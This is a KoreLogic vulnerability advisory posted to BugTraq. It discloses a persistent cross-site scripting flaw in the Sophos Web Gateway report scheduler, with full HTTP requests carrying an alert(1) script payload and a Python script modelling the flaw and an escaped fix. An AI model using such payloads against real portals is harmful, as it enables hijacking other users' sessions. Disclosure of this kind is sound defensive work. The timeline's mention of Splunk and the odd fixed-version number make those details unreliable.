BugTraq
KL-001-2018-001 : Sophos Web Gateway Persistent Cross Site Scripting Vulnerability Jan 26 2018 08:08PM
KoreLogic Disclosures (disclosures korelogic com)

Title: Sophos Web Gateway Persistent Cross Site Scripting Vulnerability
Advisory ID: KL-001-2018-001
Publication Date: 2018.01.26
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2018-001.txt

1. Vulnerability Details

Affected Vendor: Sophos
Affected Product: Web Gateway
Affected Version: 4.4.1
Platform: Embedded Linux
CWE Classification: CWE-79: Improper Neutralization of Input During Web Page Generation,
                    CWE-80: Improper Neutralization of Script-Related HTML Tags in a Web Page
Impact: Arbitrary Code Execution
Attack vector: HTTP

2. Vulnerability Description

The report scheduler menu within the management portal
contains a persistent cross site scripting vulnerability. This
vulnerability can be used to target other users of the same
portal.

3. Technical Description

A valid session is required to create the report with the
persistent cross site scripting payload attached. An example
attack payload has been included below. This payload is designed
to trigger an alert box with the number one being displayed.

POST /index.php?c=report_scheduler HTTP/1.1
Host: 1.3.3.7
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 1190
DNT: 1
Connection: close

action=save&STYLE=016a16896568739c11955632068abddd&data=%5b%7b%22%53%54%
59%4c%45%22%3a%20%22%30%31%36%61%31%36%38%39%36%35%36%38%37%33%39%63%31%
31%39%35%35%36%33%32%30%36%38%61%62%64%64%64%22%2c%20%22%63%62%5f%74%72%
61%66%5f%70%65%72%66%22%3a%20%22%79%65%73%22%2c%20%22%73%62%5f%64%65%74%
61%69%6c%65%64%5f%70%6f%6c%69%63%79%5f%63%6f%75%6e%74%22%3a%20%22%31%22%
2c%20%22%73%62%5f%67%72%6f%75%70%73%22%3a%20%22%73%6f%70%68%6f%73%5f%73%
77%61%5f%61%6c%6c%5f%64%65%70%61%72%74%6d%65%6e%74%73%22%2c%20%22%72%64%
5f%73%63%68%65%64%75%6c%65%22%3a%20%22%64%61%69%6c%79%22%2c%20%22%73%62%
5f%64%61%79%73%22%3a%20%22%37%22%2c%20%22%73%62%5f%77%65%65%6b%6c%79%5f%
64%61%79%22%3a%20%22%4d%6f%6e%64%61%79%22%2c%20%22%74%78%74%5f%73%63%68%
65%64%75%6c%65%5f%6e%61%6d%65%22%3a%20%22%74%65%73%74%3c%73%63%72%69%70%
74%3e%61%6c%65%72%74%28%31%29%3b%3c%2f%73%63%72%69%70%74%3e%22%2c%20%22%
63%62%5f%61%63%74%69%76%61%74%65%5f%73%63%68%65%64%75%6c%65%22%3a%20%22%
79%65%73%22%2c%20%22%72%65%63%69%70%69%65%6e%74%73%22%3a%20%22%74%65%73%
74%40%74%65%73%74%2e%61%73%64%61%73%64%22%2c%20%22%73%63%68%65%64%75%6c%
65%5f%69%64%22%3a%20%22%64%47%56%7a%64%41%3d%3d%22%2c%20%22%6f%77%6e%65%
72%22%3a%20%22%61%64%6d%69%6e%22%7d%5d

HTTP/1.1 200 OK
Date: Sat, 29 Jul 2017 16:05:25 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 41

{"status":0,"statusMsg":"Settings saved"}

The URL-encoded value passed in the data parameter decodes to
an array containing a single JSON object.

[{"STYLE": "016a16896568739c11955632068abddd", "cb_traf_perf": "yes", "sb_detailed_policy_count": "1",
"sb_groups": "sophos_swa_all_departments", "rd_schedule": "daily", "sb_days": "7", "sb_weekly_day": "Monday",
"txt_schedule_name": "test<script>alert(1);</script>", "cb_activate_schedule": "yes", "recipients": "test@test.asdasd",
"schedule_id": "dGVzdA==", "owner": "admin"}]

Within the JSON buffer is a key called txt_schedule_name. The
value for this key is the name of the scheduled report. This
value is included in the report schedule list.

"txt_schedule_name": "test<script>alert(1);</script>"

The HTML tags are stored as part of the schedule name. When the
report schedule list is loaded, the resulting JSON is sent with
Content-Type text/html instead of application/json, so the
browser executes any unescaped JavaScript it contains. The output
is HTML-encoded except for the txt_schedule_name value, which is
not sanitized, and the payload triggers.

POST /index.php?c=report_scheduler HTTP/1.1
Host: 1.3.3.7
Accept: text/javascript, text/html, application/xml, text/xml, */*
Accept-Language: en-US,en;q=0.5
X-Requested-With: XMLHttpRequest
X-Prototype-Version: 1.6.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 81
DNT: 1
Connection: close

action=load&sortKey=name&sortDirection=asc&STYLE=016a16896568739c1195563
2068abddd

HTTP/1.1 200 OK
Date: Sat, 29 Jul 2017 16:06:38 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: sameorigin
X-Content-Type-Options: nosniff
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 1365

{"sortKey":"name","sortDirection":"asc","schedulesJS":[{"STYLE":"016a168
96568739c11955632068abddd","cb_traf_perf":"yes","sb_detailed_policy_coun
t":"1","sb_groups":"sophos_swa_all_departments","rd_schedule":"daily","s
b_days":"7","sb_weekly_day":"Monday","txt_schedule_name":"test<script>al
ert(1);<\/script>","cb_activate_schedule":"yes","recipients":"test@test.
asdasd","schedule_id":"dGVzdA==","owner":"admin"}],"schedulesList":"<ul
id=\"table_entries_list\"><li class=\"body schedule-row \" id=\"li_test<script>alert(1);<\/script>\"><div
class=\"schedulename\"><a href=\"?STYLE=016a16896568739c11955632068abddd#\"
title=\"test<script>alert(1);<\/script>\">test<script>
alert(1);<\/script><\/a><\/div><div
class=\"owner\" title=\"admin\">admin<\/div><div class=\"schedule_time\" title=\"Daily\">Daily<\/div><div
title=\"Active\" class=\"schedule-active-on\"><\/div><div class=\"action\"><a
href=\"?STYLE=016a16896568739c11955632068abddd#\" id=\"on_off_test<script>alert(1);<\/script>\"
name=\"on_off_test<script>alert(1);<\/script>\" class=\"button small\"><span class=\"buttonLabel small\"
id=\"on_off_span_test<script>alert(1);<\/script>\">Turn Off<\/span><\/a><\/div><div class=\"delete\"><input
type=\"checkbox\" id=\"chk_test<script>alert(1);<\/script>\"\/><\/div><\/li><\
/ul>"}
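
The script below is an added example and is not part of the
KoreLogic advisory or of any Sophos code. It models the save/load
exchange above with constructed data: it decodes the data form
field the way section 3 does, renders the schedule row both as
the appliance did (raw interpolation) and in HTML-escaped form,
and adds two checks a reviewer can run over captured portal
traffic: one for JSON bodies labelled text/html, one for stored
schedule names that contain markup. The field names, the STYLE
token and the row markup are taken from the advisory's own
requests; the function names and the shortened sample schedule
are assumptions made for the example.

```python
import html
import json
from urllib.parse import parse_qs, quote

# Constructed sample data modelled on the advisory's traffic (not captured
# from a real appliance): one scheduled report whose name carries the
# advisory's alert(1) test payload.
STYLE = "016a16896568739c11955632068abddd"
SCHEDULE = [{
    "STYLE": STYLE,
    "rd_schedule": "daily",
    "txt_schedule_name": "test<script>alert(1);</script>",
    "cb_activate_schedule": "yes",
    "owner": "admin",
}]
# The save request carries the array as one percent-encoded JSON string in
# the "data" form field, as in the first request of section 3.
SAVE_BODY = f"action=save&STYLE={STYLE}&data={quote(json.dumps(SCHEDULE))}"


def decode_save_request(body: str) -> list:
    """Recover the schedule array from the URL-encoded POST body."""
    fields = parse_qs(body)          # percent-decodes every field value
    return json.loads(fields["data"][0])


def render_schedule_row(entry: dict, escape: bool) -> str:
    """Build the <li> row the "load" response returns in schedulesList.

    escape=False reproduces the flaw: the stored name is interpolated raw
    into the id, the title attribute and the link text.  escape=True is the
    hardened form; html.escape(quote=True) also covers the attribute contexts.
    """
    name = entry["txt_schedule_name"]
    if escape:
        name = html.escape(name, quote=True)
    return (
        f'<li class="body schedule-row " id="li_{name}">'
        f'<div class="schedulename"><a href="?STYLE={entry["STYLE"]}#" '
        f'title="{name}">{name}</a></div>'
        f'<div class="owner" title="{entry["owner"]}">{entry["owner"]}</div>'
        "</li>"
    )


def build_load_response(entries: list, escape: bool) -> str:
    """JSON body of the "load" reply: schedule data plus pre-rendered HTML."""
    rows = "".join(render_schedule_row(e, escape) for e in entries)
    return json.dumps({
        "sortKey": "name",
        "sortDirection": "asc",
        "schedulesJS": entries,
        "schedulesList": f'<ul id="table_entries_list">{rows}</ul>',
    })


def json_served_as_html(headers: dict, body: str) -> bool:
    """True when a body that parses as JSON is labelled text/html.

    This is the header mismatch the advisory points out; it is a cheap check
    to run over captured management-portal responses during a review.
    """
    try:
        json.loads(body)
    except ValueError:
        return False
    media_type = headers.get("Content-Type", "").split(";")[0].strip().lower()
    return media_type == "text/html"


def names_with_markup(entries: list) -> list:
    """Stored schedule names containing HTML metacharacters.

    Useful for auditing saved schedules after the fact: any hit means a name
    was accepted without being neutralised on input.
    """
    return [e["txt_schedule_name"] for e in entries
            if any(c in e["txt_schedule_name"] for c in "<>\"'")]


if __name__ == "__main__":
    entries = decode_save_request(SAVE_BODY)
    print("stored name:   ", entries[0]["txt_schedule_name"])
    print("vulnerable row:", render_schedule_row(entries[0], escape=False))
    print("hardened row:  ", render_schedule_row(entries[0], escape=True))
    hdrs = {"Content-Type": "text/html; charset=utf-8"}   # as in the advisory
    print("JSON served as text/html:",
          json_served_as_html(hdrs, build_load_response(entries, False)))
    print("names with markup:", names_with_markup(entries))
```

The escaped row still round-trips through the JSON envelope unchanged;
the difference is only that the browser now renders the literal text
`test<script>alert(1);</script>` instead of executing it. Fixing the
Content-Type to application/json is a defence in depth on top of that,
since it stops the browser from treating a directly opened response as
a document.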

4. Mitigation and Remediation Recommendation

The vendor has released version 4.3.3.1 of the Web Gateway
which addresses this issue. Release notes are available at:

http://wsa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.3.1.html

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.

6. Disclosure Timeline

2017.08.17 - KoreLogic submits vulnerability details to Sophos.
2017.08.17 - Sophos confirms receipt.
2017.09.29 - 30 business days have elapsed since the vulnerability
was reported to Sophos.
2017.10.17 - KoreLogic requests an update from Sophos.
2017.10.19 - Sophos informs KoreLogic that they will issue a fix in
the next maintenance release, scheduled for the end of
November. Sophos asks KoreLogic to hold disclosure until
the new version is released.
2017.10.23 - 45 business days have elapsed since the vulnerability
was reported to Splunk.
2017.11.02 - Sophos notifies KoreLogic that the maintenance release
has gone live.
2018.01.26 - KoreLogic public disclosure.

7. Proof of Concept

See 3. Technical Description.

The contents of this advisory are copyright(c) 2018
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

-----BEGIN PGP SIGNATURE-----

iQFOBAEBCAA4FiEE+cSrtp5jQJEtra70TWWaLA4ZiQwFAlprisQaHGRpc2Nsb3N1
cmVzQGtvcmVsb2dpYy5jb20ACgkQTWWaLA4ZiQxPawf/QC+duVUlcs5dUyn29hck
xkLHtFQxt7XcwBpI7BgtLfJL93qj+aP9TAeZlSPUj7qt+amt6OMULU4Z+tmIfDkb
ghBHVMwLdpLgb/0ZHblOqLjyuTBrvjYM8sDCo3Si2sQi7FbqYBsdxpQqYlNAlF7k
JfNK+1EaVFNkyqZnGg3YnzqM8M1eYc+Ew4QgsM7VCC3oDHrVAeg/RTepJ8FdAqrU
Ez3lPdb0JnLy32ojk+qLiPx1RE1ahbRu7Ydab5mAXKe5f9UKq7l4vD1rcY6Bm900
M0vX0mEuEkgf30ilPAUkKWD164W94MzEwWPg8Qj2O+9t6mg0sn1Cf+8eoHHMZOx9
yA==
=i8h/
-----END PGP SIGNATURE-----
